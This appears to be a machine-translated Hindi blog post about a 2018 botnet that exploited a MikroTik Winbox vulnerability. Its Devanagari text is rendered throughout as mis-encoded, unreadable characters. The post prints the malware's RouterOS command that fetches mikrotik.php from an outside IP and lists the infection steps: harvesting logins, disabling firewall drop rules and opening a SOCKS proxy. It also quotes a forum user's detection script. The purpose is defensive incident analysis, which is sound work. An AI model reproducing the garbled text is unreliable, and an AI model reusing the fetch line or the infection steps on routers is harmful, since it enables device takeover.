2 рдЕрдЧрд╕реНрдд рдХреЛ, рдореБрдЭреЗ "рдорд┐рдХреНрд░реЛрдЯрд┐рдХ: рддрддреНрдХрд╛рд▓ рд╕реБрд░рдХреНрд╖рд╛ рд╕рд▓рд╛рд╣рдХрд╛рд░" рд╕рдорд╛рдЪрд╛рд░ рдкрддреНрд░ рдкреНрд░рд╛рдкреНрдд рд╣реБрдЖ, рдЬрд┐рд╕рдореЗрдВ рдХрд╣рд╛ рдЧрдпрд╛ рдерд╛ рдХрд┐ рдПрдХ рдмреЙрдЯрдиреЗрдЯ рд╡рд┐рдирдмреЙрдХреНрд╕ рд╕реЗрд╡рд╛ рдХреА рднреЗрджреНрдпрддрд╛ рдХреЛ рд╣реИрдХ рдХрд░рдиреЗ рдФрд░ рдЙрдкрдХрд░рдгреЛрдВ рдХреЛ рд╕рдВрдХреНрд░рдорд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧ рдХрд░ рд░рд╣рд╛ рдерд╛ред
рд╕рдорд╛рдЪрд╛рд░ рдкрддреНрд░ рдХреЗ рдкрд╛рда рд╕реЗ, рдпрд╣ рд╕реНрдкрд╖реНрдЯ рд╣реЛ рдЧрдпрд╛ рдХрд┐ рднреЗрджреНрдпрддрд╛ 23 рдЕрдкреНрд░реИрд▓, 2018 рдХреЛ рд╕рдВрд╕реНрдХрд░рдг v6.42.1 рдореЗрдВ рдмрдВрдж рд╣реЛ рдЧрдИ рдереАред рдореИрдВрдиреЗ рдкреНрд░рд╛рдпреЛрдЬрд┐рдд рдЙрдкрдХрд░рдгреЛрдВ рдХреА рдЬрд╛рдВрдЪ рд╢реБрд░реВ рдХреА рдФрд░ 6.40.1 рдХреЗ рд╕рд╛рде рдХрдИ рд░рд╛рдЙрдЯрд░ рдкрд╛рдП, рдЬрд┐рдирдореЗрдВ рд╕реЗ рдПрдХ рд╕рдВрдХреНрд░рдорд┐рдд рдерд╛ред
рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреНрдпрд╛ рдХрд░рддреА рд╣реИ?- рдПрдХ рднреЗрджреНрдпрддрд╛ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреА рдПрдХ рд╕реВрдЪреА рдмрди рдЬрд╛рддреА рд╣реИ (рдпрд╛рдиреА рдХреБрдЫ рдФрд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдмрджрд▓рдирд╛ рдирд╣реАрдВ рд╕рд╣реЗрдЬрддрд╛ рд╣реИ)ред
- рдкреНрд░рд╛рдкреНрдд рд╕рднреА рд▓реЙрдЧрд┐рди рдХреЗ рд╕рд╛рде рд▓реЙрдЧ рдЗрди рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддрд╛ рд╣реИ рдФрд░ рдЕрд╡рд░реБрджреНрдз рд▓реЛрдЧреЛрдВ рдХреЛ рдорд╛рддрдо рдХрд░рддрд╛ рд╣реИред
- рд╕рдХреНрд░рд┐рдп рд▓реЙрдЧрд┐рди рдкрд╛рдХрд░, рдЕрдкрдирд╛ рдкрд╛рд╕рд╡рд░реНрдб рдкреНрд░рд╛рдкреНрдд рдХрд░рддрд╛ рд╣реИ, рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рд▓реЙрдЧ рдХрд░рддрд╛ рд╣реИред
рддреЛ:- рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рдкрд░ рд╕рднреА рдбреНрд░реЙрдк рдирд┐рдпрдореЛрдВ рдХреЛ рдирд┐рд╖реНрдХреНрд░рд┐рдп рдХрд░рддрд╛ рд╣реИред
- рдПрдХ рдЧреИрд░-рдорд╛рдирдХ рдмрдВрджрд░рдЧрд╛рд╣ рдкрд░ рдореЛрдЬреЗ (рдЖрдИрдкреА - рдореЛрдЬреЗ) рдХреЛ рд╕рдХреНрд╖рдо рдХрд░рддрд╛ рд╣реИ, рдореЗрд░реЗ рдорд╛рдорд▓реЗ рдореЗрдВ 4145ред
- рд╕реНрдХреНрд░рд┐рдкреНрдЯ
/tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ /tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no - рд▓рд┐рдкрд┐рдпреЛрдВ рдХреЛ рдЬреЛрдбрд╝рддрд╛ рд╣реИ - рд╕рд┐рд╕реНрдЯрдо - рд╢реЗрдбреНрдпреВрд▓рд░ рдореЗрдВ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд░рди рдЬреЛрдбрд╝рддрд╛ рд╣реИред
- рдореМрдЬреВрджрд╛ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреЛ рд╣рдЯрд╛рддрд╛ рд╣реИ (рдорд┐рдХрд░реЛрдЯрд┐рдХ рдордВрдЪ рджреНрд╡рд╛рд░рд╛ рд░рд┐рдкреЛрд░реНрдЯ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ)ред
рдпрд╣ рд╣рдорд▓рд╛ 95.154.216.151 рдкрддреЗ рд╕реЗ рдЖрдпрд╛ рдерд╛, рдЬреЛ рдХрд┐ рдЖрдИрдУрдорд╛рд░реНрдЯ рд╣реЛрд╕реНрдЯрд┐рдВрдЧ рд▓рд┐рдорд┐рдЯреЗрдб рдХрд╛ рд╣реИ, рдЙрдиреНрд╣реЗрдВ рд╕рд╛рдЗрдЯ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдХ рд╕рдВрджреЗрд╢ рд▓рд┐рдЦрд╛ рдерд╛, рд▓реЗрдХрд┐рди рдЕрднреА рддрдХ рдХреЛрдИ рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдирд╣реАрдВ рд╣реБрдИ рд╣реИ, рдпрд╣ рдкрддрд╛ рд╕рдХреНрд░рд┐рдп рд╣реИред
рдкрддрд╛ 95.154.216.166 рднреА рд╕рдХреНрд░рд┐рдп рд╣реИ, рд▓реЗрдХрд┐рди рдЗрд╕ рдкрд░ рдХреЛрдИ mikrotik.php рдлрд╝рд╛рдЗрд▓ рдирд╣реАрдВ рд╣реИред
рдпрд╣рд╛рдВ рдЖрдк рдкреАрдбрд╝рд┐рддреЛрдВ рдХреЗ рд╕рдВрджреЗрд╢ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ:
www.abuseipdb.com/check/95.154.216.151www.abuseipdb.com/check/95.154.216.166рдпрджрд┐ рдЖрдкрдХрд╛ рдорд┐рдХрд░реЛрдЯрд┐рдХ рдЕрднреА рддрдХ рдЕрдкрдбреЗрдЯ рдирд╣реАрдВ рд╣реБрдЖ рд╣реИ рдФрд░ рд╡рд┐рдирдмреЙрдХреНрд╕ рдкреЛрд░реНрдЯ рд╕рднреА рдХреЗ рд▓рд┐рдП рдЦреБрд▓рд╛ рд╣реИ, рддреЛ рдбрд┐рд╡рд╛рдЗрд╕ рдХреА рдЬрд╛рдВрдЪ рдХрд░рдирд╛ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░реЗрдВред- рд╣рдо рдЬрд╛рдБрдЪрддреЗ рд╣реИрдВ рдХрд┐ рдЖрдИрдкреА рдореЗрдВ рдирд┐рдпрдо рдбреНрд░реЙрдк - рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рд╕рдХреНрд░рд┐рдп рд╣реИрдВред
- рд╣рдо рдореЛрдЬреЗ рдХреА рдЬрд╛рдВрдЪ рдХрд░рддреЗ рд╣реИрдВ, рдбрд┐рд╕реНрдХрдиреЗрдХреНрдЯ рдХрд┐рдпрд╛ рдЬрд╛рдирд╛ рдЪрд╛рд╣рд┐рдП рдФрд░ рдкреЛрд░реНрдЯ рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ - 1080 рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдПред
- рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рд▓рд┐рдкрд┐рдпреЛрдВ рдХреЗ рд▓рд┐рдП рдЬрд╛рдБрдЪ рдХрд░реЗрдВ - рд▓рд┐рдкрд┐рдпреЛрдВ рдФрд░ рд╕рд┐рд╕реНрдЯрдо - рд╕рдордпрдмрджреНрдзрдХред
- Miktorik.php рдлрд╝рд╛рдЗрд▓ рдХреЗ рдЕрд╕реНрддрд┐рддреНрд╡ рдХреА рдЬрд╛рдБрдЪ рдХрд░рдирд╛
- рд╣рдо рдЯрд░реНрдорд┐рдирд▓ рдореЗрдВ рдирд┐рд░реНрдпрд╛рдд / рдирд┐рд░реНрдпрд╛рдд рдХрд░рддреЗ рд╣реИрдВ рдФрд░ рдЕрдкрдиреА рдЖрдВрдЦреЛрдВ рд╕реЗ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХреА рдЬрд╛рдВрдЪ рдХрд░рддреЗ рд╣реИрдВред
рдорд┐рдХрд░реЛрдЯрд┐рдХ рдордВрдЪ рдкрд░
рдЧреЙрдЯрд╕реНрдкреНрд░рд┐рдВрдЧ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдиреЗ рдЗрд╕ рд╡рд┐рдХрд▓реНрдк рдХрд╛ рд╕реБрдЭрд╛рд╡ рджрд┐рдпрд╛:
:if ([/ip socks get port] = 1080) do={:log info "Socks port is still Default."} else={:log info "Socks Port changed Possible infection!"} :if ([/ip socks get enabled] = false) do={:log info "Socks is not on."} else={:log info "Socks is enabled... that could be bad!"} :if ([:len [/file find name="mikrotik.php"]] > 0) do={:log info "!!!mikrotik.php!!! File Detected!"} else={:log info "mikrotik.php not found."} :if ([:len [/file find name="Mikrotik.php"]] > 0) do={:log info "!!!Mikrotik.php!!! File Detected!"} else={:log info "Mikrotik.php not found."} :if ([:len [/user find name="service"]] > 0) do={:log info "!!!YOU WERE BREACHED!!!"} else={:log info "No sign of the service user."}
рдЖрдк рд▓реЙрдЧ рдЗрди рдХрд░реЗрдВ рдФрд░ рдкрд░рд┐рдгрд╛рдо рджреЗрдЦреЗрдВред рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ "!" рдЖрдкрдХреЛ рдХреЛрдИ рд╕рдорд╕реНрдпрд╛ рд╣реЛ рд╕рдХрддреА рд╣реИред
рдЬрд╛рд╣рд┐рд░ рд╣реИ, Winbox Service рдХреЛ рд╕рднреА рдХреЗ рд▓рд┐рдП рдЦреБрд▓рд╛ рд░рдЦрдирд╛ рдмрд╣реБрдд рдмреБрд░рд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдХреБрдЫ рдорд╛рдорд▓реЛрдВ рдореЗрдВ рдРрд╕рд╛ рд╣реЛрддрд╛ рд╣реИ, рдЕрдкрдиреЗ рдЙрдкрдХрд░рдгреЛрдВ рдХреЛ рдЕрдкрдбреЗрдЯ рдХрд░рдирд╛ рди рднреВрд▓реЗрдВ!
рд╕рдВрдмрдВрдзрд┐рдд рд▓рд┐рдВрдХ:
forum.mikrotik.com/viewtopic.php?f=21&t=137572thehackernews.com/2018/08/mikrotik-router-hacking.html